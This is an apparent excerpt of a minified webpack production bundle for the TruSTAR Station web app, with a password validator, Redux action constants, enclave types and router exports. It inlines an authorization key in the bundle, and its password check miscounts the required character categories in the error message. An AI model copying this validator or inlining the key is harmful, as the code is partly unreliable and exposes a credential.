  return __WEBPACK_IMPORTED_MODULE_11_trustar_fp__["IO"].of(x).map(function (x) {
    return x.toJS();
  }).foldOr(function () {
    return x;
  });
};

/**
 * Check if something is an Immutable object.
 */
var isImmutable = function isImmutable(x) {
  return __WEBPACK_IMPORTED_MODULE_2_immutable__["Iterable"].isIterable(x);
};

var validatePasswords = function validatePasswords(password, passwordConfirm) {

  var errors = validatePassword(password);

  if (!errors.length) {
    if (!passwordConfirm) {
      errors.push('Please enter the confirmation password');
    } else if (password !== passwordConfirm) {
      errors.push('Passwords do not match');
    }
  }

  return errors;
};

var validatePassword = function validatePassword(password) {

  var errors = [];

  if (!password) {
    errors.push('Please enter a password');
  } else {

    var requiredCategoriesMessge = [];

    // Category 1: non numerics
    if (!password.match('[^a-zA-Z0-9]')) {
      requiredCategoriesMessge.push('- non-alphabetic characters (!,$,#,%)');
    }

    // Category 2: numbers
    if (!password.match('[0-9]')) {
      requiredCategoriesMessge.push('- at least one number (0-9)');
    }

    // Category 3: lower case characters
    if (!password.match('[a-z]')) {
      requiredCategoriesMessge.push('- at least one lowercase letter (a-z)');
    }

    // Category 4: capital case characters
    if (!password.match('[A-Z]')) {
      requiredCategoriesMessge.push('- at least one uppercase letter (A-Z)');
    }

    // From the total of 4 categories we allow only 1 category not to be satisfied
    if (requiredCategoriesMessge.length > 1) {
      var categoriesToSatisfy = 3 - requiredCategoriesMessge.length;
      errors.push('Your password must contain ' + categoriesToSatisfy + ' of the following: \n' + requiredCategoriesMessge.join('\n'));
    }

    if (password.length < 12) {
      errors.push('Password must be at least 12 characters long');
    }
  }

  return errors;
};

var getFunctionNamesInObject = Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["compose"])(__WEBPACK_IMPORTED_MODULE_6_ramda__["keys"], Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["pickBy"])(Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["is"])(Function)));

var resolveAPI = function resolveAPI(documentPath) {
  if (Object({"SERVICES_APTRINSIC_ENABLED":true,"SERVICES_NEW_RELIC_ENABLED":false,"SERVICES_SENTRY_ENABLED":true,"NODE_ENV":"production","ENV":"production","TRUSTAR_API_HOST":undefined,"TRUSTAR_STATION_HOST":undefined,"SPLIT_AUTHORIZATION_KEY":"7iki1574js01dvm0oq3kaaj3755bj02lgaeo","__VERSION__":"v5.2.3-23-gdec5e66"}).API_HOST && Object({"SERVICES_APTRINSIC_ENABLED":true,"SERVICES_NEW_RELIC_ENABLED":false,"SERVICES_SENTRY_ENABLED":true,"NODE_ENV":"production","ENV":"production","TRUSTAR_API_HOST":undefined,"TRUSTAR_STATION_HOST":undefined,"SPLIT_AUTHORIZATION_KEY":"7iki1574js01dvm0oq3kaaj3755bj02lgaeo","__VERSION__":"v5.2.3-23-gdec5e66"}).API_HOST.length > 0) {
    return Object({"SERVICES_APTRINSIC_ENABLED":true,"SERVICES_NEW_RELIC_ENABLED":false,"SERVICES_SENTRY_ENABLED":true,"NODE_ENV":"production","ENV":"production","TRUSTAR_API_HOST":undefined,"TRUSTAR_STATION_HOST":undefined,"SPLIT_AUTHORIZATION_KEY":"7iki1574js01dvm0oq3kaaj3755bj02lgaeo","__VERSION__":"v5.2.3-23-gdec5e66"}).API_HOST + documentPath;
  }
  return documentPath;
};

/***/ }),
/* 79 */,
/* 80 */,
/* 81 */,
/* 82 */,
/* 83 */,
/* 84 */,
/* 85 */,
/* 86 */,
/* 87 */,
/* 88 */,
/* 89 */,
/* 90 */,
/* 91 */,
/* 92 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return CLEAR_LIST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return FETCH_LIST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return FETCH_LIST_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return FETCH_LIST_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return FETCH_METADATA; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return FETCH_METADATA_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return FETCH_METADATA_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return FETCH_DATA_ALREADY_CACHED; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return CLEAR_REPORT_METADATA_CACHE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "N", function() { return STORE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "P", function() { return STORE_FROM_LOCAL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Q", function() { return STORE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "O", function() { return STORE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "H", function() { return SET_CURRENT_ID; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "I", function() { return SET_DISPLAY_OPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "r", function() { return REFETCH_REPORTS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "v", function() { return REMOVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "D", function() { return REMOVE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "C", function() { return REMOVE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "s", function() { return REINDEX; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "u", function() { return REINDEX_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "t", function() { return REINDEX_FAILURE; });
/* unused harmony export MODIFY_DISTRIBUTION */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return MODIFY_DISTRIBUTION_SUCCESS; });
/* unused harmony export MODIFY_DISTRIBUTION_FAILURE */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "E", function() { return SET_ATTRIBUTE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "G", function() { return SET_ATTRIBUTE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "F", function() { return SET_ATTRIBUTE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "w", function() { return REMOVE_ATTRIBUTE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "y", function() { return REMOVE_ATTRIBUTE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "x", function() { return REMOVE_ATTRIBUTE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "J", function() { return SET_ENCLAVE_TAG; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "K", function() { return SET_ENCLAVE_TAGS_BULK; });
/* unused harmony export SET_ENCLAVE_TAGS_BULK_SUCCESS */
/* unused harmony export SET_ENCLAVE_TAGS_BULK_FAILURE */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "M", function() { return SET_ENCLAVE_TAG_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "L", function() { return SET_ENCLAVE_TAG_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "z", function() { return REMOVE_ENCLAVE_TAG; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "B", function() { return REMOVE_ENCLAVE_TAG_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "A", function() { return REMOVE_ENCLAVE_TAG_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return EXPORT_REPORT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return COPY_REPORT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return COPY_REPORT_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return COPY_REPORT_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "o", function() { return MOVE_REPORT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "q", function() { return MOVE_REPORT_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "p", function() { return MOVE_REPORT_FAILURE; });

// The replacement: /\v(.*): null,/export const \1 = prefix\('\1'\);/g
var prefix = function prefix(str) {
  return 'station/reports/' + str;
};

var CLEAR_LIST = prefix('CLEAR_LIST');

var FETCH_LIST = prefix('FETCH_LIST');
var FETCH_LIST_SUCCESS = prefix('FETCH_LIST_SUCCESS');
var FETCH_LIST_FAILURE = prefix('FETCH_LIST_FAILURE');

var FETCH_METADATA = prefix('FETCH_METADATA');
var FETCH_METADATA_SUCCESS = prefix('FETCH_METADATA_SUCCESS');
var FETCH_METADATA_FAILURE = prefix('FETCH_METADATA_FAILURE');
var FETCH_DATA_ALREADY_CACHED = prefix('FETCH_DATA_ALREADY_CACHED');
var CLEAR_REPORT_METADATA_CACHE = prefix('CLEAR_REPORT_METADATA_CACHE');

var STORE = prefix('STORE');
var STORE_FROM_LOCAL = prefix('STORE_FROM_LOCAL'); // Used to store report objects already in other parts of state
var STORE_SUCCESS = prefix('STORE_SUCCESS');
var STORE_FAILURE = prefix('STORE_FAILURE');

var SET_CURRENT_ID = prefix('SET_CURRENT_ID');

var SET_DISPLAY_OPTIONS = prefix('SET_DISPLAY_OPTIONS');
var REFETCH_REPORTS = prefix('REFETCH_REPORTS');

var REMOVE = prefix('REMOVE');
var REMOVE_SUCCESS = prefix('REMOVE_SUCCESS');
var REMOVE_FAILURE = prefix('REMOVE_FAILURE');

var REINDEX = prefix('REINDEX');
var REINDEX_SUCCESS = prefix('REINDEX_SUCCESS');
var REINDEX_FAILURE = prefix('REINDEX_FAILURE');

var MODIFY_DISTRIBUTION = prefix('MODIFY_DISTRIBUTION');
var MODIFY_DISTRIBUTION_SUCCESS = prefix('MODIFY_DISTRIBUTION_SUCCESS');
var MODIFY_DISTRIBUTION_FAILURE = prefix('MODIFY_DISTRIBUTION_FAILURE');

var SET_ATTRIBUTE = prefix('SET_ATTRIBUTE');
var SET_ATTRIBUTE_SUCCESS = prefix('SET_ATTRIBUTE_SUCCESS');
var SET_ATTRIBUTE_FAILURE = prefix('SET_ATTRIBUTE_FAILURE');

var REMOVE_ATTRIBUTE = prefix('REMOVE_ATTRIBUTE');
var REMOVE_ATTRIBUTE_SUCCESS = prefix('REMOVE_ATTRIBUTE_SUCCESS');
var REMOVE_ATTRIBUTE_FAILURE = prefix('REMOVE_ATTRIBUTE_FAILURE');

var SET_ENCLAVE_TAG = prefix('SET_ENCLAVE_TAG');
var SET_ENCLAVE_TAGS_BULK = prefix('SET_ENCLAVE_TAGS_BULK');
var SET_ENCLAVE_TAGS_BULK_SUCCESS = prefix('SET_ENCLAVE_TAGS_BULK_SUCCESS');
var SET_ENCLAVE_TAGS_BULK_FAILURE = prefix('SET_ENCLAVE_TAGS_BULK_FAILURE');

var SET_ENCLAVE_TAG_SUCCESS = prefix('SET_ENCLAVE_TAG_SUCCESS');
var SET_ENCLAVE_TAG_FAILURE = prefix('SET_ENCLAVE_TAG_FAILURE');

var REMOVE_ENCLAVE_TAG = prefix('REMOVE_ENCLAVE_TAG');
var REMOVE_ENCLAVE_TAG_SUCCESS = prefix('REMOVE_ENCLAVE_TAG_SUCCESS');
var REMOVE_ENCLAVE_TAG_FAILURE = prefix('REMOVE_ENCLAVE_TAG_FAILURE');

var EXPORT_REPORT = prefix('EXPORT_REPORT');
var COPY_REPORT = prefix('COPY_REPORT');
var COPY_REPORT_SUCCESS = prefix('COPY_REPORT_SUCCESS');
var COPY_REPORT_FAILURE = prefix('COPY_REPORT_FAILURE');

var MOVE_REPORT = prefix('MOVE_REPORT');
var MOVE_REPORT_SUCCESS = prefix('MOVE_REPORT_SUCCESS');
var MOVE_REPORT_FAILURE = prefix('MOVE_REPORT_FAILURE');

/***/ }),
/* 93 */,
/* 94 */,
/* 95 */,
/* 96 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__BaseButton__ = __webpack_require__(526);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_0__BaseButton__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__IconButton__ = __webpack_require__(3501);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return __WEBPACK_IMPORTED_MODULE_1__IconButton__["a"]; });
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return __WEBPACK_IMPORTED_MODULE_1__IconButton__["b"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__TextButton__ = __webpack_require__(1664);
/* unused harmony reexport TextButton */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__SpinnerButton__ = __webpack_require__(3562);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return __WEBPACK_IMPORTED_MODULE_3__SpinnerButton__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__ButtonGroup__ = __webpack_require__(401);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_4__ButtonGroup__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__CheckmarkButton__ = __webpack_require__(3563);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return __WEBPACK_IMPORTED_MODULE_5__CheckmarkButton__["a"]; });







/***/ }),
/* 97 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__themes_default_themeColors__ = __webpack_require__(1476);


/***/ }),
/* 98 */,
/* 99 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return ENCLAVES_ENDPOINT; });
/* unused harmony export ENCLAVE_TEMPLATES_ENDPOINT */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return NONE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return READ_ONLY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return READ_CREATE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return READ_WRITE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return Options; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return _Enclave; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return createEnclave; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return COMMUNITY_ENCLAVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return getEnclaveGroup; });
/* unused harmony export isPrivateEnclave */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_d3_scale__ = __webpack_require__(218);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_fp__ = __webpack_require__(109);





var debug = __WEBPACK_IMPORTED_MODULE_1_debug___default()('app:modules:enclave:types'); // eslint-disable-line no-unused-vars

var ENCLAVES_ENDPOINT = '/services/enclaves';
var ENCLAVE_TEMPLATES_ENDPOINT = '/services/enclave-templates';

var NONE = 'NONE';
var READ_ONLY = 'READ_ONLY';
var READ_CREATE = 'READ_CREATE';
var READ_WRITE = 'READ_WRITE';

var Options = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  query: '',
  sortBy: 'name',
  sortOrder: 'DESC'
});

/**
 * Should not be used directly. Use createEnclave since that ensures there's a
 * color prop
 */
var _Enclave = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  id: null,
  name: '',
  description: '',
  iconUrl: '',
  iconSvgUrl: '',
  color: '',
  read: false,
  create: false,
  update: false,
  credentialsType: '',
  maximumAccess: '',
  templateId: null,
  templateName: null,
  externalUrl: null,
  companyId: null,
  ingestSource: '',
  label: '',
  accessManagementType: null
});

/**
 * Interop with immutable and standard object. Preference is given to standard
 * object props. Defaults to 'gray'
 */
var safeGetId = function safeGetId(x) {
  return __WEBPACK_IMPORTED_MODULE_3_trustar_fp__["IO"].of(x).map(function (x) {
    return x.id || x.get('id');
  }).foldOr(function (err) {
    debug('Could not get enclave id', err);
    return '__';
  });
};

var enclaveColorMapper = Object(__WEBPACK_IMPORTED_MODULE_2_d3_scale__["scaleOrdinal"])(['orange', 'teal', 'green', 'pink', 'red', 'light-purple', 'gold', 'focus-blue', 'purple', 'dark-green', 'blue', 'dark-brown']);

/**
 * Creates an enclave and assigns a color. Must pass an existing object with
 * an id attribute
 */
var createEnclave = function createEnclave(x) {
  var map = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])(x).update('color', function (c) {
    return c || enclaveColorMapper(safeGetId(x));
  });

  return _Enclave(map);
};

/**
 * NOTE: This is temporary until our back end is modified to treat community as
 * an enclave. Until then we just use this instance.
 */
var COMMUNITY_ENCLAVE = createEnclave({
  id: 'COMMUNITY',
  name: 'Community'
});

/**
 * We group enclaves for our users to improve UX. This is how we determine an
 * enclaves "group"
 *
 * Update: There used to be a lot more logic here, but now the backend is
 * passing `label` which is a nice flat way of determining the enclave group.
 * I've left this function intact in case we need to update this logic sometime
 * in the near future.
 */
var getEnclaveGroup = function getEnclaveGroup(x) {
  return x.label;
};

var isPrivateEnclave = function isPrivateEnclave(x) {
  return getEnclaveGroup(x) === 'INTERNAL';
};

/***/ }),
/* 100 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


Object.defineProperty(exports, "__esModule", {
  value: true
});
exports.routerMiddleware = exports.routerActions = exports.goForward = exports.goBack = exports.go = exports.replace = exports.push = exports.CALL_HISTORY_METHOD = exports.routerReducer = exports.LOCATION_CHANGE = exports.syncHistoryWithStore = undefined;

var _reducer = __webpack_require__(964);

Object.defineProperty(exports, 'LOCATION_CHANGE', {
  enumerable: true,
  get: function get() {
    return _reducer.LOCATION_CHANGE;
  }
});
Object.defineProperty(exports, 'routerReducer', {
  enumerable: true,
  get: function get() {
    return _reducer.routerReducer;
  }
});

var _actions = __webpack_require__(965);

Object.defineProperty(exports, 'CALL_HISTORY_METHOD', {
  enumerable: true,
  get: function get() {
    return _actions.CALL_HISTORY_METHOD;
  }
});
Object.defineProperty(exports, 'push', {
  enumerable: true,
  get: function get() {
    return _actions.push;
  }
});
Object.defineProperty(exports, 'replace', {
  enumerable: true,
  get: function get() {
    return _actions.replace;
  }
});
Object.defineProperty(exports, 'go', {
  enumerable: true,
  get: function get() {
    return _actions.go;
  }
});
Object.defineProperty(exports, 'goBack', {
  enumerable: true,
  get: function get() {
    return _actions.goBack;
  }
});
Object.defineProperty(exports, 'goForward', {
  enumerable: true,
  get: function get() {
    return _actions.goForward;
  }
});
Object.defineProperty(exports, 'routerActions', {
  enumerable: true,
  get: function get() {
    return _actions.routerActions;
  }
});

var _sync = __webpack_require__(1926);

var _sync2 = _interopRequireDefault(_sync);

var _middleware = __webpack_require__(1927);

var _middleware2 = _interopRequireDefault(_middleware);

function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { 'default': obj }; }

exports.syncHistoryWithStore = _sync2['default'];
exports.routerMiddleware = _middleware2['default'];

/***/ }),
/* 101 */,
/* 102 */,
/* 103 */,
/* 104 */,
/* 105 */,
/* 106 */,
/* 107 */,
/* 108 */,
/* 109 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Iso", function() { return Iso; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__Either_js__ = __webpack_require__(299);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "Either", function() { return __WEBPACK_IMPORTED_MODULE_0__Either_js__; });
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "either", function() { return __WEBPACK_IMPORTED_MODULE_0__Either_js__["either"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__IO_js__ = __webpack_require__(2427);
/* harmony namespace reexport (by provided) */ __webpack_require__.d(__webpack_exports__, "IO", function() { return __WEBPACK_IMPORTED_MODULE_1__IO_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__Validation_js__ = __webpack_require__(2428);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "Validation", function() { return __WEBPACK_IMPORTED_MODULE_2__Validation_js__; });









/**
 * Create an isomorphism using to functions. This provides an interface for
 * converting back and forth between different data representations.
 */

var Iso = function Iso(to, from) {
  return { to: to, from: from };
};

/***/ }),
/* 110 */,
/* 111 */,
/* 112 */,
/* 113 */,
/* 114 */,
/* 115 */,
/* 116 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return FETCH; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return FETCH_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return FETCH_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return FETCH_QUOTAS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return FETCH_QUOTAS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return FETCH_QUOTAS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return UPDATE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "q", function() { return UPDATE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return UPDATE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return UPDATE_PREFERENCES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "p", function() { return UPDATE_PREFERENCES_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "o", function() { return UPDATE_PREFERENCES_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return SAVE_PASSWORD; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return SAVE_PASSWORD_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return SAVE_PASSWORD_FAILURE; });
/* unused harmony export SUBSCRIBE_FILTER */
/* unused harmony export SUBSCRIBE_FILTER_SUCCESS */
/* unused harmony export SUBSCRIBE_FILTER_FAILURE */
/* unused harmony export DELETE_IR_FILTER */
/* unused harmony export DELETE_IR_FILTER_SUCCESS */
/* unused harmony export DELETE_IR_FILTER_FAILURE */
/* unused harmony export ADD_IR_FILTER */
/* unused harmony export ADD_IR_FILTER_SUCCESS */
/* unused harmony export ADD_IR_FILTER_FAILURE */
/* unused harmony export REGISTER_CHANNEL */
/* unused harmony export REGISTER_CHANNEL_SUCCESS */
/* unused harmony export REGISTER_CHANNEL_FAILURE */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return HIDE_UPSELL_MODAL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return PREMIUM_CONTENT_LOCK_CLICK; });
var prefix = function prefix(str) {
  return 'station/profile/' + str;
};

var FETCH = prefix('FETCH');
var FETCH_SUCCESS = prefix('FETCH_SUCCESS');
var FETCH_FAILURE = prefix('FETCH_FAILURE');

var FETCH_QUOTAS = prefix('FETCH_QUOTAS');
var FETCH_QUOTAS_SUCCESS = prefix('FETCH_QUOTAS_SUCCESS');
var FETCH_QUOTAS_FAILURE = prefix('FETCH_QUOTAS_FAILURE');

var UPDATE = prefix('UPDATE');
var UPDATE_SUCCESS = prefix('UPDATE_SUCCESS');
var UPDATE_FAILURE = prefix('UPDATE_FAILURE');

var UPDATE_PREFERENCES = prefix('UPDATE_PREFERENCES');
var UPDATE_PREFERENCES_SUCCESS = prefix('UPDATE_PREFERENCES_SUCCESS');
var UPDATE_PREFERENCES_FAILURE = prefix('UPDATE_PREFERENCES_FAILURE');

var SAVE_PASSWORD = prefix('SAVE_PASSWORD');
var SAVE_PASSWORD_SUCCESS = prefix('SAVE_PASSWORD_SUCCESS');
var SAVE_PASSWORD_FAILURE = prefix('SAVE_PASSWORD_FAILURE');

var SUBSCRIBE_FILTER = prefix('SUBSCRIBE_FILTER');
var SUBSCRIBE_FILTER_SUCCESS = prefix('SUBSCRIBE_FILTER_SUCCESS');
var SUBSCRIBE_FILTER_FAILURE = prefix('SUBSCRIBE_FILTER_FAILURE');

var DELETE_IR_FILTER = prefix('DELETE_IR_FILTER');
var DELETE_IR_FILTER_SUCCESS = prefix('DELETE_IR_FILTER_SUCCESS');
var DELETE_IR_FILTER_FAILURE = prefix('DELETE_IR_FILTER_FAILURE');

var ADD_IR_FILTER = prefix('ADD_IR_FILTER');
var ADD_IR_FILTER_SUCCESS = prefix('ADD_IR_FILTER_SUCCESS');
var ADD_IR_FILTER_FAILURE = prefix('ADD_IR_FILTER_FAILURE');

var REGISTER_CHANNEL = prefix('REGISTER_CHANNEL');
var REGISTER_CHANNEL_SUCCESS = prefix('REGISTER_CHANNEL_SUCCESS');
var REGISTER_CHANNEL_FAILURE = prefix('REGISTER_CHANNEL_FAILURE');

var HIDE_UPSELL_MODAL = prefix('HIDE_UPSELL_MODAL');

var PREMIUM_CONTENT_LOCK_CLICK = prefix('PREMIUM_CONTENT_LOCK_CLICK');

/***/ }),
/* 117 */,
/* 118 */,
/* 119 */,
/* 120 */,
/* 121 */,
/* 122 */,
/* 123 */,
/* 124 */,
/* 125 */,
/* 126 */,
/* 127 */,
/* 128 */,
/* 129 */,
/* 130 */,
/* 131 */,
/* 132 */,
/* 133 */,
/* 134 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FETCH_SERVER_SESSION_TIMEOUT_SUCCESS", function() { return FETCH_SERVER_SESSION_TIMEOUT_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SET_TIMEOUT_WARNING", function() { return SET_TIMEOUT_WARNING; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "INITIALIZE", function() { return INITIALIZE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "INITIALIZE_SUCCESS", function() { return INITIALIZE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "WARNING", function() { return WARNING; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SET_OPTIONS", function() { return SET_OPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SET_THEME_FROM_PREFERENCES", function() { return SET_THEME_FROM_PREFERENCES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SET_ACTIVITY", function() { return SET_ACTIVITY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CONFIRMATION", function() { return CONFIRMATION; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SET_LAST_ROUTE", function() { return SET_LAST_ROUTE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CONFIRM_ALIVE", function() { return CONFIRM_ALIVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CONFIRM_ALIVE_SUCCESS", function() { return CONFIRM_ALIVE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LOGIN", function() { return LOGIN; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LOGIN_SUCCESS", function() { return LOGIN_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LOGIN_FAILURE", function() { return LOGIN_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LOGIN_REDIRECT", function() { return LOGIN_REDIRECT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LOGIN_CLEAR_STATUS_MESSAGE", function() { return LOGIN_CLEAR_STATUS_MESSAGE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LOGIN_CLEAR_STATUS_MESSAGE_SUCCESS", function() { return LOGIN_CLEAR_STATUS_MESSAGE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FORCE_LOGIN", function() { return FORCE_LOGIN; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DID_LOGIN_VIA_SSO", function() { return DID_LOGIN_VIA_SSO; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LOGIN_REDIRECT_TO_EXTERNAL_APP", function() { return LOGIN_REDIRECT_TO_EXTERNAL_APP; });
